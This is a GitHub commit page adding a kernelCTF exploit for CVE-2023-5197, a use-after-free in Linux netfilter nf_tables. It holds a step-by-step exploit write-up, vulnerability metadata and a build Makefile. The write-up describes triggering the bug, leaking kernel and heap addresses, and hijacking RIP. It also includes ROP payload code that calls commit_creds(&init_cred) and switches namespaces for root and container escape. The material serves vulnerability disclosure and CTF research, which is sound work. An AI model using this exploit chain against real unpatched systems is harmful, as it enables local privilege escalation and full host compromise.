-
Notifications
You must be signed in to change notification settings - Fork 417
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add kernelCTF CVE-2023-5197_lts_cos (#100)
* Add kernelCTF CVE-2023-5197_lts_cos * update exploit.md and exploit.c
- Loading branch information
1 parent
7f8f444
commit 63b6cb1
Showing
12 changed files
with
2,568 additions
and
0 deletions.
There are no files selected for viewing
285 changes: 285 additions & 0 deletions
285
pocs/linux/kernelctf/CVE-2023-5197_lts_cos/docs/exploit.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,285 @@ | ||
### Triggering Vulnerability | ||
|
||
If the `nft_chain` where the `immediate expr` is being deleted is bound to `immediate expr`, the `immediate expr` can be deactivated twice. | ||
|
||
When an `immediate expr` of the `Vulnerable` chain is first deleted, `nft_data_release` is called in `nft_immediate_deactivate` to decrease the reference count of `nft_chain` [2]. Then, when `immediate expr` referring to `Vulnerable` chain is deleted, `nft_immediate_chain_deactivate` is called once more to deactivate the rule `[1]`. As a result the reference counter of the chain decreases twice. | ||
|
||
```c | ||
static void nft_immediate_chain_deactivate(const struct nft_ctx *ctx, | ||
struct nft_chain *chain, | ||
enum nft_trans_phase phase) | ||
{ | ||
struct nft_ctx chain_ctx; | ||
struct nft_rule *rule; | ||
|
||
chain_ctx = *ctx; | ||
chain_ctx.chain = chain; | ||
|
||
list_for_each_entry(rule, &chain->rules, list) | ||
nft_rule_expr_deactivate(&chain_ctx, rule, phase); | ||
} | ||
|
||
static void nft_immediate_deactivate(const struct nft_ctx *ctx, | ||
const struct nft_expr *expr, | ||
enum nft_trans_phase phase) | ||
{ | ||
const struct nft_immediate_expr *priv = nft_expr_priv(expr); | ||
const struct nft_data *data = &priv->data; | ||
struct nft_chain *chain; | ||
|
||
if (priv->dreg == NFT_REG_VERDICT) { | ||
switch (data->verdict.code) { | ||
case NFT_JUMP: | ||
case NFT_GOTO: | ||
chain = data->verdict.chain; | ||
if (!nft_chain_binding(chain)) | ||
break; | ||
|
||
switch (phase) { | ||
case NFT_TRANS_PREPARE_ERROR: | ||
nf_tables_unbind_chain(ctx, chain); | ||
nft_deactivate_next(ctx->net, chain); | ||
break; | ||
case NFT_TRANS_PREPARE: | ||
nft_immediate_chain_deactivate(ctx, chain, phase); // [1] | ||
nft_deactivate_next(ctx->net, chain); | ||
break; | ||
default: | ||
nft_immediate_chain_deactivate(ctx, chain, phase); | ||
nft_chain_del(chain); | ||
chain->bound = false; | ||
nft_use_dec(&chain->table->use); | ||
break; | ||
} | ||
break; | ||
default: | ||
break; | ||
} | ||
} | ||
|
||
if (phase == NFT_TRANS_COMMIT) | ||
return; | ||
|
||
return nft_data_release(&priv->data, nft_dreg_to_type(priv->dreg)); // [2] | ||
} | ||
``` | ||
We can trigger the vulnerability as follows: | ||
- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`. | ||
- Create a rule `R1` in `Base` with an immediate expr referencing the `Vulnerable`. | ||
- Create a rule `R2` in `Vulnerable` with an immediate expr referencing the `Victim`. | ||
- Trigger the vulnerability by deleting the rules `R1` and `R2` within the same transaction. This results in the `Victim` having a reference count of -1. | ||
### KASLR Bypass | ||
The KASLR address is leaked through `chain->name`, which is stored in the verdict data of the immediate expr (`nft_immediate_expr.data.verdict`). The leak process is as follows: | ||
- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`. Make the `Victim`'s name 9-16 bytes long so that it can be allocated into `kmalloc-cg-16`. | ||
- Create a rule `R1` in `Base` with an immediate expr referencing the `Vulnerable`. | ||
- Create a rule `R2` in `Vulnerable` with an immediate expr referencing the `Victim`. | ||
- Create a rule `R3` in `Base` with an immediate expr referencing the `Victim`. | ||
- Trigger the vulnerability by deleting the rules `R1` and `R2` within the same transaction. As a result, the immediate expr of `R3` is still pointing to the `Victim`, but the `Victim` has a reference count of 0. | ||
- Destroy the `Victim`, creating a dangling pointer to the `Victim` in the immediate expr of `R3`. This frees `chain->name` as well. | ||
- (LTS) Spray counter exprs (`struct nft_expr`) to place it at `Victim`'s `chain->name`. At this time, the size of counter expr (`struct nft_expr`) is 16 bytes, so the counter exprs are allocated in the `kmalloc-cg-16`. | ||
- (COS) Spray last exprs (`struct nft_expr`) to place it at `Victim`'s `chain->name`. At this time, the size of last expr (`struct nft_expr`) is 16 bytes, so the last exprs are allocated in the `kmalloc-cg-16`. | ||
- We dump the immediate expr of `R3` using `GETRULE` command, we can get the ops address of counter/last expr through the freed `chain->name` to get the kernel base address [3]. | ||
```c | ||
int nft_verdict_dump(struct sk_buff *skb, int type, const struct nft_verdict *v) | ||
{ | ||
struct nlattr *nest; | ||
nest = nla_nest_start_noflag(skb, type); | ||
if (!nest) | ||
goto nla_put_failure; | ||
if (nla_put_be32(skb, NFTA_VERDICT_CODE, htonl(v->code))) | ||
goto nla_put_failure; | ||
switch (v->code) { | ||
case NFT_JUMP: | ||
case NFT_GOTO: | ||
if (nla_put_string(skb, NFTA_VERDICT_CHAIN, | ||
v->chain->name)) // [3] | ||
goto nla_put_failure; | ||
} | ||
nla_nest_end(skb, nest); | ||
return 0; | ||
nla_put_failure: | ||
return -1; | ||
} | ||
``` | ||
|
||
### Heap Address Leak | ||
|
||
We leak the heap address in the same way as we leak the kernel base address. To leak the heap address, we sprayed the `nft_rule` instead of counter/last expr. We place `nft_rule` in freed `Victim`'s `nft_chain->name` and dump the rule of the `Base`. As a result, we can read the heap address stored in `nft_rule->list` through `Victim`'s `nft_chain->name`. We put the address of the `kmalloc-cg-96` object in `list->next` and the address of the `kmalloc-cg-192` object in `list->prev` by creating `nft_rules`. The size of the `nft_rule` can be adjusted by adding multiple `nft_exprs` inside the `nft_rule`. Since data of type string is used for leaking, we repeated the entire exploit until the heap address does not contain null. | ||
|
||
### RIP Control | ||
|
||
We use `nft_chain->blob_gen_0` to control the RIP. The `nft_chain->blob_gen_0` is used when evaluating packets in the `nft_do_chain` function [4]. | ||
|
||
```c | ||
nft_do_chain(struct nft_pktinfo *pkt, void *priv) | ||
{ | ||
... | ||
do_chain: | ||
if (genbit) | ||
blob = rcu_dereference(chain->blob_gen_1); | ||
else | ||
blob = rcu_dereference(chain->blob_gen_0); // [4] | ||
|
||
rule = (struct nft_rule_dp *)blob->data; | ||
last_rule = (void *)blob->data + blob->size; | ||
next_rule: | ||
regs.verdict.code = NFT_CONTINUE; | ||
for (; rule < last_rule; rule = nft_rule_next(rule)) { | ||
nft_rule_dp_for_each_expr(expr, last, rule) { | ||
if (expr->ops == &nft_cmp_fast_ops) | ||
nft_cmp_fast_eval(expr, ®s); | ||
else if (expr->ops == &nft_cmp16_fast_ops) | ||
nft_cmp16_fast_eval(expr, ®s); | ||
else if (expr->ops == &nft_bitwise_fast_ops) | ||
nft_bitwise_fast_eval(expr, ®s); | ||
else if (expr->ops != &nft_payload_fast_ops || | ||
!nft_payload_fast_eval(expr, ®s, pkt)) | ||
expr_call_ops_eval(expr, ®s, pkt); | ||
|
||
if (regs.verdict.code != NFT_CONTINUE) | ||
break; | ||
} | ||
... | ||
``` | ||
To do this, we assign `chain->blob_gen_0` to `kmalloc-cg-64` and trigger the vulnerability. `chain->blob_gen_0` is allocated in the `nf_tables_chain_alloc_rules` when creating new chain [5]. `chain->blob_gen_0` is allocated from the `nf_tables_chain_alloc_rules` when creating a new chain [5]. | ||
```c | ||
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask, | ||
u8 policy, u32 flags, | ||
struct netlink_ext_ack *extack) | ||
{ | ||
... | ||
data_size = offsetof(struct nft_rule_dp, data); /* last rule */ | ||
blob = nf_tables_chain_alloc_rules(data_size); // [5] | ||
if (!blob) { | ||
err = -ENOMEM; | ||
goto err_destroy_chain; | ||
} | ||
``` | ||
|
||
The size used by `kvmalloc` [6] is 40, `offsetof(struct nft_rule_dp, data)` + `sizeof(struct nft_rule_blob)` + `sizeof(struct nft_rules_old)` (8 + 24 + 8), the `blob` object is allocated in `kmalloc-cg-64`. | ||
|
||
```c | ||
static struct nft_rule_blob *nf_tables_chain_alloc_rules(unsigned int size) | ||
{ | ||
struct nft_rule_blob *blob; | ||
|
||
/* size must include room for the last rule */ | ||
if (size < offsetof(struct nft_rule_dp, data)) | ||
return NULL; | ||
|
||
size += sizeof(struct nft_rule_blob) + sizeof(struct nft_rules_old); | ||
if (size > INT_MAX) | ||
return NULL; | ||
|
||
blob = kvmalloc(size, GFP_KERNEL_ACCOUNT); // [6] | ||
if (!blob) | ||
return NULL; | ||
|
||
blob->size = 0; | ||
nft_last_rule(blob, blob->data); | ||
|
||
return blob; | ||
} | ||
``` | ||
We then spray the `udata` of the `struct nft_table` and place it in freed `blob_gen_0`. Finally, when a packet is sent, a sprayed fake ops address is referenced, resulting in RIP control [7]. | ||
```c | ||
static void expr_call_ops_eval(const struct nft_expr *expr, | ||
struct nft_regs *regs, | ||
struct nft_pktinfo *pkt) | ||
{ | ||
#ifdef CONFIG_RETPOLINE | ||
unsigned long e = (unsigned long)expr->ops->eval; | ||
#define X(e, fun) \ | ||
do { if ((e) == (unsigned long)(fun)) \ | ||
return fun(expr, regs, pkt); } while (0) // [7] | ||
X(e, nft_payload_eval); | ||
X(e, nft_cmp_eval); | ||
X(e, nft_counter_eval); | ||
X(e, nft_meta_get_eval); | ||
X(e, nft_lookup_eval); | ||
X(e, nft_range_eval); | ||
X(e, nft_immediate_eval); | ||
X(e, nft_byteorder_eval); | ||
X(e, nft_dynset_eval); | ||
X(e, nft_rt_get_eval); | ||
X(e, nft_bitwise_eval); | ||
#undef X | ||
#endif /* CONFIG_RETPOLINE */ | ||
expr->ops->eval(expr, regs, pkt); | ||
} | ||
``` | ||
|
||
### Post RIP | ||
|
||
Store the ROP payload below to the `kmalloc-cg-96` and `kmalloc-cg-192` addresses leaked above, and execute it. `The ROP payload of `kmalloc-cg-192` is stored in `nft_rule->data` when the rule is created during the heap spraying. The ROP payload of `kmalloc-cg-96` is stored by spraying `nft_table->udata` after freeing the rule used in the heap spray. | ||
|
||
```c | ||
void make_payload(uint64_t* data){ | ||
int i = 0; | ||
|
||
data[i++] = kbase + push_rbx_pop_rsp; | ||
|
||
// commit_creds(&init_cred) | ||
data[i++] = kbase + pop_rdi_ret; | ||
data[i++] = kbase + init_cred_off; | ||
data[i++] = kbase + commit_creds_off; | ||
|
||
// current = find_task_by_vpid(getpid()) | ||
data[i++] = kbase + pop_rdi_ret; | ||
data[i++] = getpid(); | ||
data[i++] = kbase + find_task_by_vpid_off; | ||
|
||
// current += offsetof(struct task_struct, rcu_read_lock_nesting) | ||
data[i++] = kbase + pop_rsi_ret; | ||
data[i++] = 0x474; | ||
data[i++] = kbase + add_rax_rsi_ret; | ||
|
||
data[i++] = kbase + pop_rsp_ret; | ||
data[i++] = heap_addr1+0x20; | ||
} | ||
|
||
void make_payload2(uint64_t* data){ | ||
int i = 0; | ||
|
||
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) | ||
data[i++] = kbase + pop_rcx_ret; | ||
data[i++] = -0xffff; | ||
data[i++] = kbase + mov_rax_rcx_ret; | ||
|
||
// find_task_by_vpid(1) | ||
data[i++] = kbase + pop_rdi_ret; | ||
data[i++] = 1; | ||
data[i++] = kbase + find_task_by_vpid_off; | ||
|
||
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) | ||
data[i++] = kbase + mov_rdi_rax_ret; | ||
data[i++] = kbase + pop_rsi_ret; | ||
data[i++] = kbase + init_nsproxy_off; | ||
data[i++] = kbase + switch_task_namespaces_off; | ||
|
||
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) | ||
data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off; | ||
data[i++] = 0; // rax | ||
data[i++] = 0; // rdx | ||
data[i++] = _user_rip; // user_rip | ||
data[i++] = _user_cs; // user_cs | ||
data[i++] = _user_rflags; // user_rflags | ||
data[i++] = _user_sp; // user_sp | ||
data[i++] = _user_ss; // user_ss | ||
} | ||
``` |
12 changes: 12 additions & 0 deletions
12
pocs/linux/kernelctf/CVE-2023-5197_lts_cos/docs/vulnerability.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
- Requirements: | ||
- Capabilites: CAP_NET_ADMIN | ||
- Kernel configuration: CONFIG_NETFILTER=y, CONFIG_NF_TABLES=y | ||
- User namespaces required: Yes | ||
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d0e2c7de92c7 | ||
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f15f29fd4779be8a418b66e9d52979bb6d6c2325 | ||
- Affected Version: v5.9-rc1 - v6.6-rc2 | ||
- Affected Component: net/netfilter | ||
- Syscall to disable: disallow unprivileged username space | ||
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-5197 | ||
- Cause: Use-After-Free | ||
- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. Addition and removal of rules from chain bindings within the same transaction causes leads to use-after-free. We recommend upgrading past commit f15f29fd4779be8a418b66e9d52979bb6d6c2325. |
39 changes: 39 additions & 0 deletions
39
pocs/linux/kernelctf/CVE-2023-5197_lts_cos/exploit/cos-105-17412.156.23/Makefile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
LIBMNL_DIR = $(realpath ./)/libmnl_build | ||
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build | ||
|
||
LIBS = -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl | ||
INCLUDES = -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include | ||
CFLAGS = -static -s | ||
|
||
exploit: | ||
gcc -o exploit exploit.c $(LIBS) $(INCLUDES) $(CFLAGS) | ||
|
||
prerequisites: libmnl-build libnftnl-build | ||
|
||
libmnl-build : libmnl-download | ||
tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 | ||
cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install` | ||
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc` | ||
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install | ||
|
||
libnftnl-build : libmnl-build libnftnl-download | ||
tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz | ||
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install` | ||
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make -j`nproc` | ||
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install | ||
|
||
libmnl-download : | ||
mkdir $(LIBMNL_DIR) | ||
wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 | ||
|
||
libnftnl-download : | ||
mkdir $(LIBNFTNL_DIR) | ||
wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz | ||
|
||
run: | ||
./exploit | ||
|
||
clean: | ||
rm -f exploit | ||
rm -rf $(LIBMNL_DIR) | ||
rm -rf $(LIBNFTNL_DIR) |
Binary file added
BIN
+924 KB
pocs/linux/kernelctf/CVE-2023-5197_lts_cos/exploit/cos-105-17412.156.23/exploit
Binary file not shown.
Oops, something went wrong.